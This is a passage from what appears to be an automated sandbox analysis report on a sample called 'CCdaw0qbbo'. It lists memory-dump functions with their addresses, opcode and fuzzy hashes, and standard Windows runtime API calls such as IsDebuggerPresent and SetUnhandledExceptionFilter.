                        • Instruction Fuzzy Hash: EE017B712082058F8B1D8A396C0286AFFB9FBC2310708893BD84BCA245CA71CE4AC744
                        Function 025E3A19 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: P H
                        • API String ID: 0-2122193570
                        • Opcode ID: 96776cf2cd26c915adea0c5174a74f0f2ab3d9e167db6053961e8c4133e93ee1
                        • Instruction ID: 7fdb053c44b2a8823192d28ffbbd2e311a116c2c01caa9c6b8e45841f2336fff
                        • Opcode Fuzzy Hash: 96776cf2cd26c915adea0c5174a74f0f2ab3d9e167db6053961e8c4133e93ee1
                        • Instruction Fuzzy Hash: 31F0F632F0001CABDB445D6AD8543EE3BA3FBC5320F5184B5E95AAB3C0EA758D268794
                        Function 025E2690 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: t<
                        • API String ID: 0-79568080
                        • Opcode ID: ac89d3be0fbe25c107975c89e7e0b3ae0f0b890bbee1075b72b6bf2587c8c7d2
                        • Instruction ID: bc9a9652de4d25cb15d4b85b1cf46ca788128a156b36bff539122715948320c0
                        • Opcode Fuzzy Hash: ac89d3be0fbe25c107975c89e7e0b3ae0f0b890bbee1075b72b6bf2587c8c7d2
                        • Instruction Fuzzy Hash: 02F0F6B13042098B8F1C8929AC0186BFAEEF7C5310704893BD91BDA348CE71CE45C699
                        Function 025E10B0 Relevance: .2, Instructions: 154COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3b4a96780d5583b1f194c40bb979b5023967fdba0faaef50f09b29a53c3e22fd
                        • Instruction ID: bc3dc554bb64f63535686e18c8574ecac1f228f1fc359026b9c391888265ef8f
                        • Opcode Fuzzy Hash: 3b4a96780d5583b1f194c40bb979b5023967fdba0faaef50f09b29a53c3e22fd
                        • Instruction Fuzzy Hash: 4351D5302006469FDA05FB38C99069EBB63FBC1310F508AA4C14A9B665DB74ED5E8BD9
                        Function 025E2718 Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f0f3e4b0bf4f3ff72e0e31afd7c3be4a436280216af505d80200c237f1fbf349
                        • Instruction ID: f28fbc8d77f91f6e87da4f118ca796b368f4837a2d81b55eb270b1ccdd446d4d
                        • Opcode Fuzzy Hash: f0f3e4b0bf4f3ff72e0e31afd7c3be4a436280216af505d80200c237f1fbf349
                        • Instruction Fuzzy Hash: 20017D72B142406FD7144A3A9C86976FFAAFBCD31070584A7E407DB345C620DC16CB54
                        Function 025E15A0 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6d30a6b332016248dbb83bee4692ba61309a03ee11d204bae28164fdfbff631c
                        • Instruction ID: e6cc67ef9b30d8222a48621e07218e019c538734ca21af7057244de5eb83cea8
                        • Opcode Fuzzy Hash: 6d30a6b332016248dbb83bee4692ba61309a03ee11d204bae28164fdfbff631c
                        • Instruction Fuzzy Hash: 08F028B2A049446FDB18CE2A68818A1FBE1FBC5220308C67BD10FC2642D770EC51CED5
                        Function 025E1998 Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8582835e1c47166818423e15b5770733fcd64f1db2672f39122a816050fd4640
                        • Instruction ID: 8611a4ed5d38976fd4d5180bfbc86cf165d378c73716f3dc2996d52a006b80ab
                        • Opcode Fuzzy Hash: 8582835e1c47166818423e15b5770733fcd64f1db2672f39122a816050fd4640
                        • Instruction Fuzzy Hash: 30F04C31F001188BDF184E1998456DBB7BBEBD4321F00C43BE511E7250EBB04D3A46D0
                        Function 025E0838 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 48d873e40b3ae2818272fab6f800c9fc6ef779e514421fec7ac9bf270d1be4c1
                        • Instruction ID: cb12a9a93e3b68ff7f0bec9ff7c1c89028b189d921ba3a1a77e7a2c617a3ad59
                        • Opcode Fuzzy Hash: 48d873e40b3ae2818272fab6f800c9fc6ef779e514421fec7ac9bf270d1be4c1
                        • Instruction Fuzzy Hash: 03D012B2C891809FCF030B70789A1F83F74DD1612439A04C1E8C585413A615053BEB10
                        Function 025E24D8 Relevance: .0, Instructions: 13COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5846c395f1e343d26fcf324753817d816a49bb5ffb220ce931f2b4e2ddb03e3b
                        • Instruction ID: 6e51561b3f9a57ac735bf0412062227ced46c29597d2390e83878adecf2078af
                        • Opcode Fuzzy Hash: 5846c395f1e343d26fcf324753817d816a49bb5ffb220ce931f2b4e2ddb03e3b
                        • Instruction Fuzzy Hash: 4ED0A9705900809B8B0F4E208E105663B2E7F46204B425852AC86CA00AE632C292EA8E
                        Function 025E1B67 Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 715d09ce44e6c00ee3074f43a9ed9bfe4d89f83aa6df76c963f722a9d86dcd70
                        • Instruction ID: 6de7410483f848f2c8ce25165d870dc5f01c0907010312a80113843752334707
                        • Opcode Fuzzy Hash: 715d09ce44e6c00ee3074f43a9ed9bfe4d89f83aa6df76c963f722a9d86dcd70
                        • Instruction Fuzzy Hash: 4BD0A574F081400EC61149344CC015C3A136755114F0802CB8DD55EA53D0114811C745
                        Function 025E0B5D Relevance: .0, Instructions: 9COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 885982d9a983908799188586398f7f585198a2cc06e055dfb07907c1d94c2e95
                        • Instruction ID: fb2fd2da570351fd3eb499c05a5b9741907051af714da2f9a70899eabd9ec4b8
                        • Opcode Fuzzy Hash: 885982d9a983908799188586398f7f585198a2cc06e055dfb07907c1d94c2e95
                        • Instruction Fuzzy Hash: 74C01234A007064BDA09AA78D65415C7B62AB842007418925D412A6159EA248A19EA85
                        Function 025E1C61 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7ab9d8d5e49c29faaf1e1a4a13a55cf32d7b90f4b4b901db37dd774218d0757e
                        • Instruction ID: 1beb8014b058add35358d9b274542b039e156954612ea2ef6afd94dc406cd8a8
                        • Opcode Fuzzy Hash: 7ab9d8d5e49c29faaf1e1a4a13a55cf32d7b90f4b4b901db37dd774218d0757e
                        • Instruction Fuzzy Hash: 41C08C30A40200CFE7298F329A1002AB6A3BBEC2003418A2E800B8A250C736D40ECA08
                        Function 025E3BDD Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 72d32e4b4d8e23731a7ebdbe814ade1c074f1a4c1a4f39381afacba52e8a349b
                        • Instruction ID: 2d96133649c12cea66da2b1db21a230a7f00c181eae1ef40d43648af18f020a5
                        • Opcode Fuzzy Hash: 72d32e4b4d8e23731a7ebdbe814ade1c074f1a4c1a4f39381afacba52e8a349b
                        • Instruction Fuzzy Hash: CAC02B718280048AC70CFB38F7413D8AB2B77C0340701C812C022230F8D6109E04CC49
                        Function 025E0848 Relevance: .0, Instructions: 6COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e5ee0480d3734784713ee09b07af87e472dec03874de90820c5cad77181ba7b4
                        • Instruction ID: 2177f566f8b0912df68fb43d5be802dab6d0e4842636854a450afde981389eb4
                        • Opcode Fuzzy Hash: e5ee0480d3734784713ee09b07af87e472dec03874de90820c5cad77181ba7b4
                        • Instruction Fuzzy Hash: 45A01230884108CB82012F50F40D11D771CA5002053C24410B40D400017A2114386AA8
                        Function 025E2067 Relevance: .0, Instructions: 6COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3885fed2683867cda88de026cc438a6ff7213646d16f431e1a64d6b380bda47b
                        • Instruction ID: 55dc396df7e075971b1a2cebca64f7f1a6b090b06c141b4815f569bcc1fd3d8a
                        • Opcode Fuzzy Hash: 3885fed2683867cda88de026cc438a6ff7213646d16f431e1a64d6b380bda47b
                        • Instruction Fuzzy Hash: 13C09273252705CF92295AB18285032B6B3FFA8A513469D1A904BE9660DB39DA19CA04

                        Non-executed Functions

                        Function 6E366FDA Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6E366FE6
                        • IsDebuggerPresent.KERNEL32 ref: 6E3670B2
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E3670CB
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 6E3670D5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                        • String ID:
                        • API String ID: 254469556-0
                        • Opcode ID: 98fe69fdd6cb4997582c79775cad3f728040545939576090fe78fc189d941e2e
                        • Instruction ID: 3142a3cac276f10619d2a9892edaa4d403f84e89e4a6fbb656759c692e790e39
                        • Opcode Fuzzy Hash: 98fe69fdd6cb4997582c79775cad3f728040545939576090fe78fc189d941e2e
                        • Instruction Fuzzy Hash: B8313C75D01229DBDF20DFA4D8497CDBBB8AF08304F1041EAE40DAB284EB719A84CF54
                        Function 6E366040 Relevance: 5.5, Strings: 4, Instructions: 482COMMONLIBRARYCODE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: F5E$F5E$usoF$usoF
                        • API String ID: 0-1873587089
                        • Opcode ID: 4afcc9a95dcb501b9623c872515462402b2dc3893d75b1183e2232f0ddda8e70
                        • Instruction ID: fffcfe7a0b8b5707ab2574849a6030e33c1951660cd5ef848c2efb325a8b0652
                        • Opcode Fuzzy Hash: 4afcc9a95dcb501b9623c872515462402b2dc3893d75b1183e2232f0ddda8e70
                        • Instruction Fuzzy Hash: 7302C476A641069FCB04CFFCD5806CDBBFAAB4A380F24511AE402FB358D63A9D45CB65
                        Function 6E36AF77 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E36B06F
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E36B079
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6E36B086
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: 43aebdd170513e25562381633bad1f7dcde1fba68471d879a13766f5d095e84c
                        • Instruction ID: bd8b895cfd3595cbf87766d583a6f6e2165178873fb9cedf270fe3a590b9de65
                        • Opcode Fuzzy Hash: 43aebdd170513e25562381633bad1f7dcde1fba68471d879a13766f5d095e84c
                        • Instruction Fuzzy Hash: 6C31D675911229EBCF61DF64D888BCDBBB8BF08310F6045DAE41CA7294E7709B858F54
                        Function 6E371BC5 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E371BC0,?,?,00000008,?,?,6E3717C3,00000000), ref: 6E371DF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: 47bc5b225b881015648fea38644944a92dffb463d6f892a7efd4b8de7bcb043e
                        • Instruction ID: f124f703dffc43fea15fceef51b7272295f8d90635d15e7ad4ae1e75c82ee85a
                        • Opcode Fuzzy Hash: 47bc5b225b881015648fea38644944a92dffb463d6f892a7efd4b8de7bcb043e
                        • Instruction Fuzzy Hash: C8B17D322106098FDB64CF68C4A6B657BE0FF45364F258658E8E9CF2A1C33AD985CF44
                        Function 6E367198 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E3671AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor
                        • String ID:
                        • API String ID: 2325560087-0
                        • Opcode ID: f81613a45489db2fe7c73dfcd8548268f03879e966ae928ae11465c2991967f1
                        • Instruction ID: 5ad17a5ee0775758853bc45922fbe2bad04da0c1c314b96205692196307d86d2
                        • Opcode Fuzzy Hash: f81613a45489db2fe7c73dfcd8548268f03879e966ae928ae11465c2991967f1
                        • Instruction Fuzzy Hash: DA51A071A156068FEF54CFA4C59179EBBF4FB4A310F60816AD440EB398E376D950CB90
                        Function 6E36CD4B Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: dee81bd8d6622e4441de8027a0a512d201324be734ab511be3d2b25a7a469e55
                        • Instruction ID: ec8f3235bd8043e19027ea0ccdd430415d3dcdcbda83307b42b78ccd5d1a73c5
                        • Opcode Fuzzy Hash: dee81bd8d6622e4441de8027a0a512d201324be734ab511be3d2b25a7a469e55
                        • Instruction Fuzzy Hash: 31A011B020AA22CB8F008E32820A208BABCAA02A80322802CA008C0000FB228000CF02
                        Function 6E357AB0 Relevance: .3, Instructions: 268COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8cf02ce2a6fb136f1111631a278eb5ba23986672f0374b89a0ce36ffc184c476
                        • Instruction ID: 8704cc0a33d4ad46a1bab2f6324b49e3d81a7c3b2c374e72ed794499c078d9c6
                        • Opcode Fuzzy Hash: 8cf02ce2a6fb136f1111631a278eb5ba23986672f0374b89a0ce36ffc184c476
                        • Instruction Fuzzy Hash: 5B91E672B555158FDF08CFBCC5A5BDE7BF6AB4A320F108219E925EB3C4C23699058B90
                        Function 025E6220 Relevance: .2, Instructions: 211COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79e99a667bf108ac6f2c19699d982652453a9c63332e532643c3bd1ee7ef729d
                        • Instruction ID: 5ce81d4ce6f965f39aef4cd1ed279fbb9d08c0f01b26e599e9a72c1e6461f04d
                        • Opcode Fuzzy Hash: 79e99a667bf108ac6f2c19699d982652453a9c63332e532643c3bd1ee7ef729d
                        • Instruction Fuzzy Hash: 7C61E19281E7E55FE7076B3828B91C53F70AC67258B0B01E7C6D0CF0A7E449495EC7AA
                        Function 025E1640 Relevance: .2, Instructions: 180COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f1633f3cf5355d298858652f0c27ed146ee6f523dcc2f5e899303631a027b434
                        • Instruction ID: f599cf68f1d09740f2dd41913109927226cccbf58c40b3bf8a0b9ecd373768d3
                        • Opcode Fuzzy Hash: f1633f3cf5355d298858652f0c27ed146ee6f523dcc2f5e899303631a027b434
                        • Instruction Fuzzy Hash: 86518772B04A419FCB08CF68D4E19EABBB2FB85224B58C566D44BDBA01D330DD16C784
                        Function 025E3418 Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 05db0de8a713622ddbe0e957b75d344da019370c11bef1761ad91ee8f56d58e7
                        • Instruction ID: e26f4acdefb7e09c5e4a006952de8378d2ff0f6d487a0e481387aa38474690f3
                        • Opcode Fuzzy Hash: 05db0de8a713622ddbe0e957b75d344da019370c11bef1761ad91ee8f56d58e7
                        • Instruction Fuzzy Hash: B1413B32B08191AFCF0A8B6CD8942BEBB72BFC5210F5948E7D446DB242D131DD468799
                        Function 025E2BA0 Relevance: .1, Instructions: 123COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c88384e96784fa324545f29dea2e008c497a2fe9a32dc7e8cea0c30fb5a4d686
                        • Instruction ID: 6693ba841a21447d1edfbbd762cfccf75ae4572af504177ec9c4056417a2915d
                        • Opcode Fuzzy Hash: c88384e96784fa324545f29dea2e008c497a2fe9a32dc7e8cea0c30fb5a4d686
                        • Instruction Fuzzy Hash: F641F431714601CFCB18CF39C98666ABBFAFB84210F148C6AE45FDBA68D230E941CB15
                        Function 025E2BB0 Relevance: .1, Instructions: 119COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b33968b7c0fdbdb2b9d3023f655d401d20aeed722108b307aa460c00a1efcf5f
                        • Instruction ID: ade4baa9b0424c607c8bd25da0f4c3436c23a9ee4e7daf26e78ff0400d421e4b
                        • Opcode Fuzzy Hash: b33968b7c0fdbdb2b9d3023f655d401d20aeed722108b307aa460c00a1efcf5f
                        • Instruction Fuzzy Hash: 1641C431750605CFCB18CF29C986A5BB7FAFB84210F149C2AE51FDBA68D270E941CB15
                        Function 025E1630 Relevance: .1, Instructions: 109COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f823ba8550eae7785c2019aa63ac90e53586709ecc0e11dcd89b91a6e80e8e6b
                        • Instruction ID: 4fbf3c78187a136dc065074a2d7ccd35c1831d01dce90d49528890ad921d39f7
                        • Opcode Fuzzy Hash: f823ba8550eae7785c2019aa63ac90e53586709ecc0e11dcd89b91a6e80e8e6b
                        • Instruction Fuzzy Hash: 133129B2B00A05DFCB08CF58C591AAABB76BB94310F18CA26D51BDBA40C770ED55C795
                        Function 025E35F8 Relevance: .1, Instructions: 80COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bf50627fecc80367c8d46a5afb9ffa2af11f5012e5c5796cefc674cbe64fbbe0
                        • Instruction ID: 75db83a51b983146954e8f06cccd8a800be6b817f819b8dc1d0e1fc76cf6c544
                        • Opcode Fuzzy Hash: bf50627fecc80367c8d46a5afb9ffa2af11f5012e5c5796cefc674cbe64fbbe0
                        • Instruction Fuzzy Hash: DE21E9B1E141069BCB48CE79C9815BFFBB6BB85310F1298A7E406EB251C274DE45CBC9
                        Function 6E368A0A Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • type_info::operator==.LIBVCRUNTIME ref: 6E368B29
                        • ___TypeMatch.LIBVCRUNTIME ref: 6E368C37
                        • _UnwindNestedFrames.LIBCMT ref: 6E368D89
                        • CallUnexpected.LIBVCRUNTIME ref: 6E368DA4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
